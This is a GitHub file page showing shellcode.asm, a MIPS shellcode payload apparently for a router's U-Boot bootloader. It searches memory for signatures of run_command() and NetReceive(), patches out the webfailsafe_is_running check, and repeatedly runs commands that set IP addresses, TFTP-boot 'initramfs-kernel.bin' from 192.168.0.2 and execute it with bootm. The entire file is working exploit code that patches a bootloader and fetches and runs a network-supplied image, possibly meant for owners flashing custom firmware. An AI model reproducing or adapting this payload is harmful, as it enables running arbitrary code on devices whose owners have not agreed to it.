-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathshellcode.asm
122 lines (107 loc) · 2.59 KB
/
shellcode.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
.section .text
# locate run_command()
la $a0, b_run_command_signature
li $a1, i_run_command_signature_size
la $t9, search
jalr $ra, $t9
addi $s0, $v0, -20 #function starts 20 bytes before sig
# locate NetReceive()
la $a0, b_netreceive_signature
li $a1, i_netreceive_signature_size
la $t9, search
jalr $ra, $t9
addiu $s1, $v0, 32 #branch instruction is 32 bytes after sig
# patch NetReceive to replace webfailsafe_is_running check with noop
sw $zero, ($s1)
nop
# need to flush instruction cache to use NetReceive patch immediately
synci 0($s1)
sync
la $t0, cleared
jr.hb $t0
cleared:
# call run_command to setup ips
li $a1, 0x0
la $a0, s_setenv_serverip
move $t9, $s0
jalr $ra, $t9 # run_command("setenv serverip 192.168.0.2", 0)
li $a1, 0x0
la $a0, s_setenv_ipaddr
move $t9, $s0
jalr $ra, $t9 # run_command("setenv ipaddr 192.168.0.1", 0)
# call run_command to do tftp boot
loop:
li $a1, 0x0
la $a0, s_tftpboot
move $t9, $s0
jalr $ra, $t9 # run_command("tftpboot 0x82000000 initramfs-kernel.bin", 0)
li $a1, 0x0
la $a0, s_bootm
move $t9, $s0 # run_command("bootm 0x82000000", 0)
jalr $ra, $t9
b loop
# char* search(char* bytes, int bytes_len):
# search memory between ram_start and ram_end for
# bytes, returns first address whose contents match, or 0 if not found
search:
lw $t0, ram_start
search_outer_loop:
addiu $t0, 4
lw $t1, ram_end
bltu $t0, $t1, search_inner_loop_init
move $v0, $zero
jr $ra
search_inner_loop_init:
move $t1, $a1
move $t2, $a0
move $t3, $t0
search_inner_loop_next:
lb $t4, 0($t2)
lb $t5, 0($t3)
bne $t4, $t5, search_outer_loop
addiu $t2, $t2, 1
addiu $t3, $t3, 1
addi $t1, $t1, -1
bgtz $t1, search_inner_loop_next
move $v0, $t0
jr $ra
.balign 64
s_setenv_serverip:
.asciz "setenv serverip 192.168.0.2"
.balign 64
s_setenv_ipaddr:
.asciz "setenv ipaddr 192.168.0.1"
.balign 64
s_tftpboot:
.asciz "tftpboot 0x82000000 initramfs-kernel.bin"
.balign 64
s_bootm:
.asciz "bootm 0x82000000"
.balign 64
ram_start:
.word 0x87f00000
ram_end:
.word 0x87ffff00
.balign 64
b_run_command_signature:
.word 0xAFBC0010
.word 0xAFB20688
.word 0xAFB10684
.word 0xAFB00680
.word 0xAFBF06A4
.word 0xAFBE06A0
.word 0xAFB7069C
.word 0xAFB60698
.word 0xAFB50694
.word 0xAFB40690
.word 0xAFB3068C
.set i_run_command_signature_size, .-b_run_command_signature
.balign 64
b_netreceive_signature:
.word 0xAFBF0034
.word 0xAFB50030
.word 0xAFB4002C
.word 0xAFB30028
.word 0xAFB20024
.word 0xAFB0001C
.set i_netreceive_signature_size, .-b_netreceive_signature